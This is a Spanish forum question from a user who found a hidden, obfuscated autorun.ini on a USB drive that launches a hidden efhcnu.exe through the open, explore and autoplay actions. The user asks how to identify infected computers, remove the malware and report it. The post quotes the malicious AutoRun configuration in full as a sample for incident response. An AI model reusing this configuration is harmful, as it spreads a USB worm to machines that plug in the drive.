Descubrí un archivo, llamado autorun.ini en mi unidad flash USB:
[AutoRun]
; FjYfoT
; jpId UagEbddsb PCjo
oPEn = efhcnu.exe
sheLl \ open \ DEfault = 1
; utvDpsMqpT dDustbemW XyAy WeywFbvaVA eQnK
sHeLL \ open \ COmmanD = efhcnu.exe
; uRprWb
ShEll \ expLore \ coMmANd = efhcnu.exe
; kdtrelceNy uEeF gFTf
shEll \ autoPLAy \ commAND = efhcnu.exe
Tanto él como el efhcnu.exe que lo acompaña están ocultos bajo las ventanas y son visibles solo después de que "Mostrar archivos del sistema" esté habilitado.
efhcnu.exe tiene un tamaño de 168kB.
Mis prioridades son:
- identifique qué computadoras fueron infectadas y cuál es el daño
- eliminar el malware
- reportar este incidente al público
¿Cómo debo proceder?